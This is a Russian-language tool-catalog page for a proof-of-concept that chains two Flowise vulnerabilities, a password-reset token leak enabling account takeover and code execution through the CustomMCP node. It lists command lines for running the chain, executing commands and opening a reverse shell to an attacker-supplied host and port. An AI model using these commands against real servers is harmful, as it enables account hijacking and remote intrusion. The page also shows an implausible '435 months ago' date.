Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 и CVE-2025-59528 chain POC | Kitploit
Инструменты/GitHubGitHub/azureadtrent/cve-2025-58434-59528
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияИнструмент Удаленного Доступа
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 и CVE-2025-59528 chain POC

Репозиторий
435 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434 + CVE-2025-59528

Эксплойт-цепочка для двух уязвимостей, затрагивающих Flowise <= 3.0.5.


Уязвимости

CVE-2025-58434 — Неавторизованный захват аккаунта

Эндпоинт сброса пароля возвращает действительный токен сброса пароля в ответе API без необходимости аутентификации. Злоумышленник, знающий действительный адрес электронной почты, может сбросить пароль любого аккаунта без взаимодействия с пользователем.

CVE-2025-59528 — Авторизованное удаленное выполнение кода

Узел CustomMCP передает управляемые пользователем данные непосредственно конструктору Function() с полными привилегиями Node.js. Авторизованный пользователь с действительным API-ключом может выполнять произвольные команды ОС от имени пользователя процесса Flowise.

Исправлено в: Flowise 3.0.6


Требования

  • Python 3.8+
  • pip install requests

Использование

Полная цепочка ATO (сбрасывает пароль, запрашивает API-ключ, запускает reverse shell):

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

Только RCE (если у вас уже есть API-ключ):

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Reverse shell с существующим ключом:

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Опции

ФлагОписание
-t, --targetЦелевой URL
-e, --emailEmail целевого аккаунта (запускает цепочку ATO)
--api-keyУказать API-ключ напрямую (пропускает ATO)
-c, --commandКоманда для выполнения
--lhostIP атакующего для reverse shell
--lportПорт атакующего для reverse shell (по умолчанию: 4444)
--new-passwordПароль, устанавливаемый при сбросе (по умолчанию: Pwn3d!2026)
-k, --insecureПропустить проверку TLS

Примечания

Из-за особенности Flowise 3.0.5 эндпоинт API сброса пароля не сразу обновляет учетные данные, принимаемые эндпоинтом входа. Скрипт делает паузу после сброса и предлагает вам вручную войти в интерфейс и скопировать API-ключ из /apikey.

Скачать инструмент